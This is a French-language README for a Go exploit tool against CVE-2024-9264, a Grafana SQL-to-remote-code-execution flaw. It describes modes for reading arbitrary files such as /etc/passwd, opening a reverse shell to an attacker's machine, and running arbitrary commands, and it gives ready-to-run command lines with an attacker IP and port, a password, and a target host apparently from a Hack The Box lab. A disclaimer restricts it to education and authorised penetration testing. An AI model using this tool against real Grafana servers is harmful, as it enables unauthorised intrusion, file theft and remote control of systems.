
Une implémentation go pour CVE-2024-9264 qui affecte les versions 11.0.x, 11.1.x et 11.2.x de grafana.
Outil d'exploitation pour CVE-2024-9264, une vulnérabilité critique dans Grafana permettant à un attaquant authentifié d'exécuter une requête SQL conduisant à une RCE
🛡️ Cet outil est strictement destiné à des fins éducatives et à des tests d'intrusion autorisés.
Toute utilisation non autorisée est illégale et contraire à l'éthique.
CVE-2024-9264 est une faille critique dans Grafana permettant à un attaquant authentifié d'exécuter des commandes SQL conduisant à une RCE et à la lecture de fichiers
file – Lire des fichiers arbitraires (par exemple, /etc/passwd)shell – Shell inversé vers la machine de l'attaquantcommand – Exécuter des commandes shell arbitraires (par exemple, whoami)
Tous les arguments ne sont pas nécessaires.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]